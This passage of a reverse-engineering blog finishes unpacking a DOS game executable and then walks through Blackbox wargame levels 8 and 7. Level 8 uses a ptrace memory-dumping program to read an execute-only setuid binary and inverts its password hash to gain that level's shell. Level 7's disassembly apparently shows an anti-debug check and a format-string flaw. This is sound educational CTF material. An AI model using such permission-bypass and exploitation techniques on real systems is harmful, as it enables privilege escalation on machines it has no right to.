So to summarize the unpacking algorithm (I use C to denote the current offset in the output):

The packed code contains control words.
The control words are read bit-by-bit from LSB to MSB.
1 - read the next byte from the stream and copy it to the output as-is.
00 - read the next two bits from the control into N. read the next byte from the stream into D. Copy N+2 bytes from C+D-256 to the output.
01 - read the next word from the stream. Extract N from the 3 LSB of the high bytes, and D from the word resulting by right-shifting the high byte by 3. Then:

If N = 0, This is the end of stream, we are done.
If N = 1, We need to readjust the segments.
if N > 1, Copy N+1 bytes from C+D-8192 to the output.

This algorithm specification is actually enough to be able to unpack the code.
But in reality, the bootstrapping is not over yet. For one, the control needs to be passed to the unpacked code.
So for the sake of being thorough, let's continue just a bit more.

Relocation

When the end-of-stream has been reached, we jump to:

000000FC  0E                push cs
000000FD  1F                pop ds
000000FE  BE5801            mov si,0x158

Set ds to the current code segment, and load si with 0x158. This leads me to suspect that ds:si is now pointing to some data at the tail of the code:

$ xxd DAVE.EXE |grep -A20 "12af0:"
0012af0: 8ed6 8be7 fb2e ff2f 01dd 3200 3910 1530  ......./..2.9..0
0012b00: 2515 0015 3e12 00ed 1019 2000 0b14 00f0  %...>..... .....
0012b10: 0100 5e01 c85a 008d 0900 670a 5b87 4cdd  ..^..Z....g.[.L.
0012b20: 7400 8a01 0081 0200 0100                 t.........

Not that there will be any use for that data to us.

00000101  5B                pop bx
00000102  83C310            add bx,byte +0x10
00000105  89DA              mov dx,bx

OK, remember from way way before, when I said that the PSP segment was pushed to the stack? Well, it's still there (so far all the stack operations were balanced). The size of the PSP is 256 bytes, or, 10 paragraphs, so bx holds the segment address immediately following the PSP, which is also the start of the code, this time the unpacked code.

00000107  31FF              xor di,di
00000109  AC                lodsb
0000010A  08C0              or al,al
0000010C  7416              jz 0x124
0000010E  B400              mov ah,0x0
00000110  01C7              add di,ax
00000112  8BC7              mov ax,di
00000114  83E70F            and di,byte +0xf
00000117  B104              mov cl,0x4
00000119  D3E8              shr ax,cl
0000011B  01C2              add dx,ax
0000011D  8EC2              mov es,dx
0000011F  26011D            add [es:di],bx
00000122  EBE5              jmp short 0x109
00000124  AD                lodsw
00000125  09C0              or ax,ax
00000127  7508              jnz 0x131
00000129  81C2FF0F          add dx,0xfff
0000012D  8EC2              mov es,dx
0000012F  EBD8              jmp short 0x109
00000131  3D0100            cmp ax,0x1
00000134  75DA              jnz 0x110

I'll spare you the deep analysis, but what happens here is this:

That data contains offsets to addresses which need to be relocated.
These offsets are cumulative (the offset to relocation address N is the sum of the first N entries in the table).
For each relocation address, the segment address of the code start is added to the segment address in the code.
The way these offsets are encoded is that each offset is a byte, unless that byte is 0, in which case the offset is a word.
The iteration ends when a word whose value is 1 is read.

This sums up the relocation process.

Wrapping up

The only thing left is jumping into the unpacked (and relocated) code to start the game:

00000136  8BC3              mov ax,bx

The segment address of the code start is loaded into ax.

00000138  8B3E0400          mov di,[0x4]        ; di = var_0x4
0000013C  8B360600          mov si,[0x6]
00000140  01C6              add si,ax           ; si = var_0x6 + reloc
00000142  01060200          add [0x2],ax        ; var_0x2 += reloc
00000146  2D1000            sub ax,0x10
00000149  8ED8              mov ds,ax           ; ds = PSP segment
0000014B  8EC0              mov es,ax           ; es = PSP segment
0000014D  31DB              xor bx,bx           ; bx = 0
0000014F  FA                cli
00000150  8ED6              mov ss,si           ; ss = var_0x6 + reloc
00000152  8BE7              mov sp,di           ; sp = var_0x4
00000154  FB                sti

This code just sets up the initial stack address (segment & offset), which also means that we can identify var_0x6 as the initial stack segment and var_0x4 as the initial stack offset. The code also loads var_0x2 with the segment address of the code start. The next (and last) instruction will reveal why:

00000155  2EFF2F            jmp word far [cs:bx]

This is a far jump, meaning that the address is loaded from two words at cs:0, the first (var_0x0) is the offset, and the second (var_0x2) is the segment, which means that the entry points in the unpacked code is simply its beginning.

That's it for the easy and fun part, next time I will start reverse engineering the code we had just unpacked.

Saturday, January 28, 2012

Blackbox - chapter 8

As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Let's see what level 8 holds in store:

$ ssh -p 2225 level8@blackbox.smashthestack.org
level8@blackbox.smashthestack.org's password:
...
level8@blackbox:~$ ls -l
total 16
-rw-r--r-- 1 root   root      10 2008-01-24 05:58 password
-rws--x--x 1 level9 level9 12254 2007-12-29 14:10 secrets

Wait a minute here, what's that? We only have execution permissions for secrets.
How can we analyze it if we can't even read it?
Well, there is a way, using ptrace sorcery. I won't go into too much depth here, so I recommend you read Playing with ptrace, Part I (I'd also recommend you read part II, just for general knowledge).
Anyway, to summarize these articles, the way debuggers work is by forking, invoking ptrace with PTRACE_TRACEME in the child, and then executing the to-be-traced process. The parent process can then control the child process and read its status using other ptrace calls.
So let's write a little program that does just that, and reads the memory contents of the child process where the child process will be secrets, this is how we can cheat the permission mechanism.

level8@blackbox:/tmp$ cat > wrap.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    int pid;
    char *prog[] = {"/home/level8/secrets", NULL};
    long addr;
    long size;
    int i = 0;
    int val;
    struct user_regs_struct regs;
    if (argc != 3) {
        printf("Usage: %s <address> <number of long words>\n", argv[0]);
        return 1;
    }
    addr = strtoul(argv[1], NULL, 16);
    size = strtoul(argv[2], NULL, 10);
    pid = fork();
    if (0 == pid) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        execve(prog[0], prog, NULL);
    } else {
        wait(NULL);
        for (i = 0; i < size; ++i) {
            val = ptrace(PTRACE_PEEKTEXT, pid, addr + 4*i, NULL);
            printf("%02x", val & 0xFF);
            printf("%02x", (val >> 8) & 0xFF);
            printf("%02x", (val >> 16) & 0xFF);
            printf("%02x", (val >> 24) & 0xFF);
        }
        printf("\n");
        ptrace(PTRACE_KILL, pid, NULL, NULL);
    }
    return 0;
}

level8@blackbox:/tmp$ gcc -o wrap wrap.c

As you can see, the child just invokes ptrace with PTRACE_TRACEME and executes the level's program.
The parents waits for the child to stop, and then reads the specified amount of long words from the specified address, prints them out encoded as a hex string, and then kills the child.
Let's try out our new toy, but which address interests us? Well, the function main commonly starts at 0x08048464, as for the number of bytes we read, let's read some large amount, I'm sure main isn't too long:

level8@blackbox:/tmp$ ./wrap 0x08048464 200
5589e55381ec3404000083e4f0b80000000029c4c745f464870408c7042475870408e8cdfeffff8945f0c
785e4fbffff000000008b45f0890424e8c5feffff483985e4fbffff734781bde4fbfffffb0300007602eb
398d85e8fbffff89c3039de4fbffff8b85e4fbffff0345f08d48018b85e4fbffff0345f00fb6100fb6012
8d0045a88038d85e4fbffffff00eba58d85e8fbffff89c20395e4fbffff8b85e4fbffff0345f00fb600c0
f804240f042188028d85e9fbffff89c20395e4fbffff8b85e4fbffff0345f00fb600240f042188028d85e
afbffff0385e4fbffffc60000c785e4fbffff000000008d85e8fbffff890424e80bfeffff483985e4fbff
ff7205e99b0000008d85e8fbffff89c1038de4fbffff8d85e8fbffff89c20395e4fbffff8d85e9fbffff0
385e4fbffff0fb600320288018d85e9fbffff89c1038de4fbffff8d85e9fbffff89c20395e4fbffff8d85
e8fbffff0385e4fbffff0fb600320288018d85e8fbffff89c1038de4fbffff8d85e8fbffff89c20395e4f
bffff8d85e9fbffff0385e4fbffff0fb600320288018d85e4fbffff830002e949ffffff8d95e8fbffff8b
45f489442404891424e81dfdffff85c0751ac7042492870408e85dfdffffc704249b870408e811fdffffe
b0cc70424a3870408e843fdffffb8000000008b5dfcc9c3905589e5575631f65383ec0ce8a000000081c3
44120000e8a5fcffff8d9314ffffff8d8314ffffff29c2c1fa0239d6731c89d78db426000000008dbc270
0000000ff94b314ffffff4639fe72f483c40c5b5e5f5dc38db6000000008dbf000000005589e583ec0889
1c24e84200000081c3e6110000897424048d8314ffffff8d9314ffffff29d0c1f80285c08d70ff7510e85
b0000008b1c248b74240489ec5dc3ff94b314ffffff89f04e85c075f2ebe08b1c24c39090909090909090
909090905589e55383ec04bb90980408a19098040883f8ff74168d76008dbc270000000083eb04ffd08b0
383f8ff75f4585b5dc35589e553e8000000005b81c35b11000052e89afcffff8b5dfcc9c3000300000001
000200555b5b5a526357666358564d246c222300506c6561736520656e74657220796f

Now, to disassemble this I will use nasm which is not installed on the blackbox server. First I'll decode the hex string into a binary file which I will call main.bin, and then I will disassemble it at the base address of main:

~$ ndisasm -u -o 0x08048464 main.bin |cat -n|grep ret
   124 0804864E  C3                ret
   154 080486A3  C3                ret
   176 080486EF  C3                ret
   184 08048703  C3                ret
   215 0804873F  C3                ret
   226 0804875A  C3                ret
~$ ndisasm -u -o 0x08048464 main.bin | head -n 124
08048464  55                push ebp
08048465  89E5              mov ebp,esp
08048467  53                push ebx
08048468  81EC34040000      sub esp,0x434
0804846E  83E4F0            and esp,byte -0x10
08048471  B800000000        mov eax,0x0
08048476  29C4              sub esp,eax
08048478  C745F464870408    mov dword [ebp-0xc],0x8048764
0804847F  C7042475870408    mov dword [esp],0x8048775
08048486  E8CDFEFFFF        call dword 0x8048358
0804848B  8945F0            mov [ebp-0x10],eax
0804848E  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
08048498  8B45F0            mov eax,[ebp-0x10]
0804849B  890424            mov [esp],eax
0804849E  E8C5FEFFFF        call dword 0x8048368
080484A3  48                dec eax
080484A4  3985E4FBFFFF      cmp [ebp-0x41c],eax
080484AA  7347              jnc 0x80484f3
080484AC  81BDE4FBFFFFFB03  cmp dword [ebp-0x41c],0x3fb
         -0000
080484B6  7602              jna 0x80484ba
080484B8  EB39              jmp short 0x80484f3
080484BA  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484C0  89C3              mov ebx,eax
080484C2  039DE4FBFFFF      add ebx,[ebp-0x41c]
080484C8  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484CE  0345F0            add eax,[ebp-0x10]
080484D1  8D4801            lea ecx,[eax+0x1]
080484D4  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484DA  0345F0            add eax,[ebp-0x10]
080484DD  0FB610            movzx edx,byte [eax]
080484E0  0FB601            movzx eax,byte [ecx]
080484E3  28D0              sub al,dl
080484E5  045A              add al,0x5a
080484E7  8803              mov [ebx],al
080484E9  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080484EF  FF00              inc dword [eax]
080484F1  EBA5              jmp short 0x8048498
080484F3  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484F9  89C2              mov edx,eax
080484FB  0395E4FBFFFF      add edx,[ebp-0x41c]
08048501  8B85E4FBFFFF      mov eax,[ebp-0x41c]
08048507  0345F0            add eax,[ebp-0x10]
0804850A  0FB600            movzx eax,byte [eax]
0804850D  C0F804            sar al,0x4
08048510  240F              and al,0xf
08048512  0421              add al,0x21
08048514  8802              mov [edx],al
08048516  8D85E9FBFFFF      lea eax,[ebp-0x417]
0804851C  89C2              mov edx,eax
0804851E  0395E4FBFFFF      add edx,[ebp-0x41c]
08048524  8B85E4FBFFFF      mov eax,[ebp-0x41c]
0804852A  0345F0            add eax,[ebp-0x10]
0804852D  0FB600            movzx eax,byte [eax]
08048530  240F              and al,0xf
08048532  0421              add al,0x21
08048534  8802              mov [edx],al
08048536  8D85EAFBFFFF      lea eax,[ebp-0x416]
0804853C  0385E4FBFFFF      add eax,[ebp-0x41c]
08048542  C60000            mov byte [eax],0x0
08048545  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
0804854F  8D85E8FBFFFF      lea eax,[ebp-0x418]
08048555  890424            mov [esp],eax
08048558  E80BFEFFFF        call dword 0x8048368
0804855D  48                dec eax
0804855E  3985E4FBFFFF      cmp [ebp-0x41c],eax
08048564  7205              jc 0x804856b
08048566  E99B000000        jmp dword 0x8048606
0804856B  8D85E8FBFFFF      lea eax,[ebp-0x418]
08048571  89C1              mov ecx,eax
08048573  038DE4FBFFFF      add ecx,[ebp-0x41c]
08048579  8D85E8FBFFFF      lea eax,[ebp-0x418]
0804857F  89C2              mov edx,eax
08048581  0395E4FBFFFF      add edx,[ebp-0x41c]
08048587  8D85E9FBFFFF      lea eax,[ebp-0x417]
0804858D  0385E4FBFFFF      add eax,[ebp-0x41c]
08048593  0FB600            movzx eax,byte [eax]
08048596  3202              xor al,[edx]
08048598  8801              mov [ecx],al
0804859A  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485A0  89C1              mov ecx,eax
080485A2  038DE4FBFFFF      add ecx,[ebp-0x41c]
080485A8  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485AE  89C2              mov edx,eax
080485B0  0395E4FBFFFF      add edx,[ebp-0x41c]
080485B6  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485BC  0385E4FBFFFF      add eax,[ebp-0x41c]
080485C2  0FB600            movzx eax,byte [eax]
080485C5  3202              xor al,[edx]
080485C7  8801              mov [ecx],al
080485C9  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485CF  89C1              mov ecx,eax
080485D1  038DE4FBFFFF      add ecx,[ebp-0x41c]
080485D7  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485DD  89C2              mov edx,eax
080485DF  0395E4FBFFFF      add edx,[ebp-0x41c]
080485E5  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485EB  0385E4FBFFFF      add eax,[ebp-0x41c]
080485F1  0FB600            movzx eax,byte [eax]
080485F4  3202              xor al,[edx]
080485F6  8801              mov [ecx],al
080485F8  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080485FE  830002            add dword [eax],byte +0x2
08048601  E949FFFFFF        jmp dword 0x804854f
08048606  8D95E8FBFFFF      lea edx,[ebp-0x418]
0804860C  8B45F4            mov eax,[ebp-0xc]
0804860F  89442404          mov [esp+0x4],eax
08048613  891424            mov [esp],edx
08048616  E81DFDFFFF        call dword 0x8048338
0804861B  85C0              test eax,eax
0804861D  751A              jnz 0x8048639
0804861F  C7042492870408    mov dword [esp],0x8048792
08048626  E85DFDFFFF        call dword 0x8048388
0804862B  C704249B870408    mov dword [esp],0x804879b
08048632  E811FDFFFF        call dword 0x8048348
08048637  EB0C              jmp short 0x8048645
08048639  C70424A3870408    mov dword [esp],0x80487a3
08048640  E843FDFFFF        call dword 0x8048388
08048645  B800000000        mov eax,0x0
0804864A  8B5DFC            mov ebx,[ebp-0x4]
0804864D  C9                leave
0804864E  C3                ret

I hope you don't mind that we switched from the gas syntax to the intel syntax, but it's good to learn to read both.
Anyway, since we disassembled raw code, we don't have any symbolic information, so we are going to have have to guess function based on context. So let's start:

08048478  C745F464870408    mov dword [ebp-0xc],0x8048764

This loads the local variable at ebp-0xc with some constant which looks like an address in the data section. Let's use our tool again to read what's in that address.

level8@blackbox:/tmp$ ./wrap 0x08048764 10
555b5b5a526357666358564d246c222300506c6561736520656e74657220796f7572207061737377

See the 00 there? I suspect it is a string terminator, let's see what that string is:

level8@blackbox:/tmp$ python -c "print '%r' % '555b5b5a526357666358564d246c\
2223'.decode('hex')"
'U[[ZRcWfcXVM$l"#'

Odd string...seems like gibberish, we'll give ebp-0xc the name gibberish then. Let's continue, it might make more sense later:

0804847F  C7042475870408    mov dword [esp],0x8048775
08048486  E8CDFEFFFF        call dword 0x8048358
0804848B  8945F0            mov [ebp-0x10],eax

This is a function call with one parameter, which also looks like an address in the data section:

level8@blackbox:/tmp$ ./wrap 0x08048775 10
506c6561736520656e74657220796f75722070617373776f72643a200057656c636f6d650a002f62

Again, I spot another string terminator, so let's decode the string:

level8@blackbox:/tmp$ python -c "print '%r' % '506c6561736520656e7465722079\
6f75722070617373776f72643a20'.decode('hex')"
'Please enter your password: '

Aha, a prompt. It also looks like the return value is stored in the stack at ebp-0x10. This means that this is not some regular printf or puts.

0804848E  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000

That's some sort of initialization of a variable at ebp-0x41c.

08048498  8B45F0            mov eax,[ebp-0x10]
0804849B  890424            mov [esp],eax
0804849E  E8C5FEFFFF        call dword 0x8048368
080484A3  48                dec eax
080484A4  3985E4FBFFFF      cmp [ebp-0x41c],eax
080484AA  7347              jnc 0x80484f3

This executes a mystery function on whatever was stored in ebp-0x10 (the return from that prompt function), subtracts 1 from the return value and compares the result to the variable at ebp-0x41c. Sort of like this:

if (var_41c >= (func(var_10) - 1)) goto 0x80484f3

Let's call that address label1 from now on, in case we see it again.

080484AC  81BDE4FBFFFFFB03  cmp dword [ebp-0x41c],0x3fb
         -0000
080484B6  7602              jna 0x80484ba
080484B8  EB39              jmp short 0x80484f3

This compares var_41c to the constant 0x3fb, and jumps to some new location, or to label1 if the test fails. Equivalent C code:

if (var_41c <= 0x3fb) goto 0x80484f3
else goto label1

Let's call the new address label2.
For the next piece of code, notice it starts at label2, I'll just annotate it:

label2:
080484BA  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484C0  89C3              mov ebx,eax
080484C2  039DE4FBFFFF      add ebx,[ebp-0x41c]
080484C8  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484CE  0345F0            add eax,[ebp-0x10]
080484D1  8D4801            lea ecx,[eax+0x1]
080484D4  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484DA  0345F0            add eax,[ebp-0x10]
080484DD  0FB610            movzx edx,byte [eax]
080484E0  0FB601            movzx eax,byte [ecx]
080484E3  28D0              sub al,dl
080484E5  045A              add al,0x5a
080484E7  8803              mov [ebx],al
080484E9  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080484EF  FF00              inc dword [eax]
080484F1  EBA5              jmp short 0x8048498

What happens here is this, and you can verify it yourself:

var_418[var_41c] = var_10[var_41c + 1] - var_10[var_41c] + 0x5a;
var_41c++;

This tells us several things:

var_41c is some sort of index, from now on we will call it idx.
var_418 is some temporary buffer in the stack, we'll call it buf.
var_10, which was returned from the prompt function, is a pointer to some input, most probably the user input, and the the prompt function is a prompt-and-read function. We will call it input.

At the end of that section, there's a jump to 0x8048498 which we will call label3. We've already been there, it's the piece that contained the mystery function. Let's rewrite it, but with more meaningful names and see if it sheds some new light:

if (idx >= (func(input) - 1)) goto label1
else if (idx <= 0x3fb) goto label2
else goto label1

I think we can spots what's happening here, mystery function func is actually strlen, and this is part of a while statement:

while ((idx < strlen(input)) && (idx <= 0x3fb)) {
    buf[idx] = input[idx + 1] - input[idx] + 0x5a;
    idx++;
}
/* do label1 stuff */

OK, let's see what happens at label1 (I'm going to start annotating the code with variable names):

label1:
080484F3  8D85E8FBFFFF      lea eax,[buf]
080484F9  89C2              mov edx,eax
080484FB  0395E4FBFFFF      add edx,[idx]
08048501  8B85E4FBFFFF      mov eax,[idx]
08048507  0345F0            add eax,[input]
0804850A  0FB600            movzx eax,byte [eax]
0804850D  C0F804            sar al,0x4
08048510  240F              and al,0xf
08048512  0421              add al,0x21
08048514  8802              mov [edx],al

This translates to:

buf[idx] = 0x21 + (input[idx] >> 4) & 0xf;

The next chunk:

08048516  8D85E9FBFFFF      lea eax,[buf+1]
0804851C  89C2              mov edx,eax
0804851E  0395E4FBFFFF      add edx,[idx]
08048524  8B85E4FBFFFF      mov eax,[idx]
0804852A  0345F0            add eax,[input]
0804852D  0FB600            movzx eax,byte [eax]
08048530  240F              and al,0xf
08048532  0421              add al,0x21
08048534  8802              mov [edx],al

Which translates to:

buf[idx + 1] = 0x21 + input[idx] & 0xf;

Next we have:

08048536  8D85EAFBFFFF      lea eax,[buf+2]
0804853C  0385E4FBFFFF      add eax,[idx]
08048542  C60000            mov byte [eax],0x0
08048545  C785E4FBFFFF0000  mov dword [idx],0x0
         -0000

This is equivalent to:

buf[idx + 2] = 0;
idx = 0;

This looks like something string-like was terminated, and the index was reset, probably for a second pass. Let's see what happens next:

0804854F  8D85E8FBFFFF      lea eax,[buf]
08048555  890424            mov [esp],eax
08048558  E80BFEFFFF        call dword 0x8048368 [strlen]
0804855D  48                dec eax
0804855E  3985E4FBFFFF      cmp [idx],eax
08048564  7205              jc 0x804856b [label4]
08048566  E99B000000        jmp dword 0x8048606 [label5]

Translated to C:

if (idx < strlen(buf) - 1) goto label4;
else goto label5;

The next piece of code starts at label4, and has a repeating pattern, so I'll paste it all at once:

label4:
0804856B  8D85E8FBFFFF      lea eax,[buf]
08048571  89C1              mov ecx,eax
08048573  038DE4FBFFFF      add ecx,[idx]
08048579  8D85E8FBFFFF      lea eax,[buf]
0804857F  89C2              mov edx,eax
08048581  0395E4FBFFFF      add edx,[idx]
08048587  8D85E9FBFFFF      lea eax,[buf+1]
0804858D  0385E4FBFFFF      add eax,[idx]
08048593  0FB600            movzx eax,byte [eax]
08048596  3202              xor al,[edx]
08048598  8801              mov [ecx],al
0804859A  8D85E9FBFFFF      lea eax,[buf+1]
080485A0  89C1              mov ecx,eax
080485A2  038DE4FBFFFF      add ecx,[idx]
080485A8  8D85E9FBFFFF      lea eax,[buf+1]
080485AE  89C2              mov edx,eax
080485B0  0395E4FBFFFF      add edx,[idx]
080485B6  8D85E8FBFFFF      lea eax,[buf]
080485BC  0385E4FBFFFF      add eax,[idx]
080485C2  0FB600            movzx eax,byte [eax]
080485C5  3202              xor al,[edx]
080485C7  8801              mov [ecx],al
080485C9  8D85E8FBFFFF      lea eax,[buf]
080485CF  89C1              mov ecx,eax
080485D1  038DE4FBFFFF      add ecx,[idx]
080485D7  8D85E8FBFFFF      lea eax,[buf]
080485DD  89C2              mov edx,eax
080485DF  0395E4FBFFFF      add edx,[idx]
080485E5  8D85E9FBFFFF      lea eax,[buf+1]
080485EB  0385E4FBFFFF      add eax,[idx]
080485F1  0FB600            movzx eax,byte [eax]
080485F4  3202              xor al,[edx]
080485F6  8801              mov [ecx],al

Which is:

buf[idx] = buf[idx] ^ buf[idx + 1];
buf[idx + 1] = buf[idx] ^ buf[idx + 1];
buf[idx] = buf[idx] ^ buf[idx + 1];

That's just the code for swapping bytes.
Next we have:

080485F8  8D85E4FBFFFF      lea eax,[idx]
080485FE  830002            add dword [eax],byte +0x2
08048601  E949FFFFFF        jmp dword 0x804854f

Which increments the index by 2 and then jumps back to the index comparison, which makes it look like another loop:

for (idx = 0; i < strlen(buf) - 1; i += 2) {
    buf[idx] = buf[idx] ^ buf[idx + 1];
    buf[idx + 1] = buf[idx] ^ buf[idx + 1];
    buf[idx] = buf[idx] ^ buf[idx + 1];
}

Next is the code that gets executed when the loop is exhausted:

label5:
08048606  8D95E8FBFFFF      lea edx,[buf]
0804860C  8B45F4            mov eax,[gibberish]
0804860F  89442404          mov [esp+0x4],eax
08048613  891424            mov [esp],edx
08048616  E81DFDFFFF        call dword 0x8048338
0804861B  85C0              test eax,eax
0804861D  751A              jnz 0x8048639

I think by this time you figured out what's happening here, gibberish is a password hash, and the the program did so far is to hash the input password, and this is where they get compared.
I won't continue analyzing the code anymore, because that's enough. Let's combine all the little pieces of C code and see what we can do:

while ((idx < strlen(input)) && (idx <= 0x3fb)) {
    buf[idx] = input[idx + 1] - input[idx] + 0x5a;
    idx++;
}

buf[idx] = 0x21 + (input[idx] >> 4) & 0xf;
buf[idx + 1] = 0x21 + input[idx] & 0xf;
buf[idx + 2] = 0;

for (idx = 0; i < strlen(buf) - 1; i += 2) {
    buf[idx] = buf[idx] ^ buf[idx + 1];
    buf[idx + 1] = buf[idx] ^ buf[idx + 1];
    buf[idx] = buf[idx] ^ buf[idx + 1];
}

Well, we know the hash, and we know the hashed password. We can now perform an inverse hash and obtain the original password.
That should be easy, working backwards:

Unswap every two consecutive bytes in the hash.
Take the last two bytes, subtract 0x21 from them, and recombine them to a single byte, one being the high nibble, and the other the low nibble. Now we know input[N]
Reversing the formula for buf inside the while we can obtain a regression formula for the input: input[i] = input[i + 1] - buf[i] + 0x5a.

I think I'll leave it to you to write a script and obtain the password yourselves.
I'll check check if it works:

level8@blackbox:~$ ./secrets
Please enter your password: 
Welcome
sh-3.1$

Just one last level to go ;)

Blackbox - chapter 7

$ ssh -p 2225 level7@blackbox.smashthestack.org
level7@blackbox.smashthestack.org's password:
...
level7@blackbox:~$ ls -l
total 12
-rwsr-xr-x 1 level8 level8 7851 2008-04-21 18:26 heybabe
-rw-r--r-- 1 root   level7   10 2008-01-24 05:56 passwd

No source, so like the previous time, let's start with dumping the data:

level7@blackbox:~$ objdump -s --section=.rodata heybabe

heybabe:     file format elf32-i386

Contents of section .rodata:
 80486b0 03000000 01000200 75736167 653a2025  ........usage: %
 80486c0 73203c61 72673e0a 00000000 54726163  s <arg>.....Trac
 80486d0 696e6720 64657465 63746564 203a2920  ing detected :) 
 80486e0 736f7272 79202e2e 2e2e2e00 544f5547  sorry ......TOUG
 80486f0 48205348 49542100 57616c6b 20746865  H SHIT!.Walk the
 8048700 20776179 206f6620 74686520 31333337   way of the 1337
 8048710 206f6e65 2100                         one!.

As before, I've colored the strings, and made a summary:

80486b8: usage : %s <arg>\n
80486cc: Tracing detected :) sorry .....
80486ec: TOUGH SHIT!
80486f8: Walk the way of the 1337 one!

Now we'll disassemble main:

level7@blackbox:~$ objdump -d heybabe|grep -A80 "<main>:"
08048464 <main>:
 8048464: 8d 4c 24 04           lea    0x4(%esp),%ecx
 8048468: 83 e4 f0              and    $0xfffffff0,%esp
 804846b: ff 71 fc              pushl  0xfffffffc(%ecx)
 804846e: 55                    push   %ebp
 804846f: 89 e5                 mov    %esp,%ebp
 8048471: 57                    push   %edi
 8048472: 51                    push   %ecx
 8048473: 81 ec 10 04 00 00     sub    $0x410,%esp
 8048479: 89 8d 04 fc ff ff     mov    %ecx,0xfffffc04(%ebp)
 804847f: 8b 85 04 fc ff ff     mov    0xfffffc04(%ebp),%eax
 8048485: 83 38 02              cmpl   $0x2,(%eax)
 8048488: 74 27                 je     80484b1 <main+0x4d>
 804848a: 8b 95 04 fc ff ff     mov    0xfffffc04(%ebp),%edx
 8048490: 8b 42 04              mov    0x4(%edx),%eax
 8048493: 8b 00                 mov    (%eax),%eax
 8048495: 89 44 24 04           mov    %eax,0x4(%esp)
 8048499: c7 04 24 b8 86 04 08  movl   $0x80486b8,(%esp)
 80484a0: e8 cf fe ff ff        call   8048374 <printf@plt>
 80484a5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ac: e8 d3 fe ff ff        call   8048384 <exit@plt>
 80484b1: c7 44 24 0c 00 00 00  movl   $0x0,0xc(%esp)
 80484b8: 00 
 80484b9: c7 44 24 08 01 00 00  movl   $0x1,0x8(%esp)
 80484c0: 00 
 80484c1: c7 44 24 04 00 00 00  movl   $0x0,0x4(%esp)
 80484c8: 00 
 80484c9: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 80484d0: e8 7f fe ff ff        call   8048354 <ptrace@plt>
 80484d5: 85 c0                 test   %eax,%eax
 80484d7: 79 18                 jns    80484f1 <main+0x8d>
 80484d9: c7 04 24 cc 86 04 08  movl   $0x80486cc,(%esp)
 80484e0: e8 5f fe ff ff        call   8048344 <puts@plt>
 80484e5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ec: e8 93 fe ff ff        call   8048384 <exit@plt>
 80484f1: 8b bd 04 fc ff ff     mov    0xfffffc04(%ebp),%edi
 80484f7: 8b 47 04              mov    0x4(%edi),%eax
 80484fa: 83 c0 04              add    $0x4,%eax
 80484fd: 8b 00                 mov    (%eax),%eax
 80484ff: c7 44 24 08 e7 03 00  movl   $0x3e7,0x8(%esp)
 8048506: 00 
 8048507: 89 44 24 04           mov    %eax,0x4(%esp)
 804850b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048511: 89 04 24              mov    %eax,(%esp)
 8048514: e8 7b fe ff ff        call   8048394 <strncpy@plt>
 8048519: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 804851f: b9 ff ff ff ff        mov    $0xffffffff,%ecx
 8048524: 89 85 00 fc ff ff     mov    %eax,0xfffffc00(%ebp)
 804852a: b0 00                 mov    $0x0,%al
 804852c: fc                    cld    
 804852d: 8b bd 00 fc ff ff     mov    0xfffffc00(%ebp),%edi
 8048533: f2 ae                 repnz scas %es:(%edi),%al
 8048535: 89 c8                 mov    %ecx,%eax
 8048537: f7 d0                 not    %eax
 8048539: 48                    dec    %eax
 804853a: 40                    inc    %eax
 804853b: c6 84 05 10 fc ff ff  movb   $0x0,0xfffffc10(%ebp,%eax,1)
 8048542: 00 
 8048543: c7 44 24 04 24 00 00  movl   $0x24,0x4(%esp)
 804854a: 00 
 804854b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048551: 89 04 24              mov    %eax,(%esp)
 8048554: e8 db fd ff ff        call   8048334 <strchr@plt>
 8048559: 85 c0                 test   %eax,%eax
 804855b: 74 18                 je     8048575 <main+0x111>
 804855d: c7 04 24 ec 86 04 08  movl   $0x80486ec,(%esp)
 8048564: e8 0b fe ff ff        call   8048374 <printf@plt>
 8048569: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 8048570: e8 0f fe ff ff        call   8048384 <exit@plt>
 8048575: c7 04 24 f8 86 04 08  movl   $0x80486f8,(%esp)
 804857c: e8 f3 fd ff ff        call   8048374 <printf@plt>
 8048581: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048587: 89 04 24              mov    %eax,(%esp)
 804858a: e8 e5 fd ff ff        call   8048374 <printf@plt>
 804858f: b8 00 00 00 00        mov    $0x0,%eax
 8048594: 81 c4 10 04 00 00     add    $0x410,%esp
 804859a: 59                    pop    %ecx
 804859b: 5f                    pop    %edi
 804859c: 5d                    pop    %ebp
 804859d: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80485a0: c3                    ret

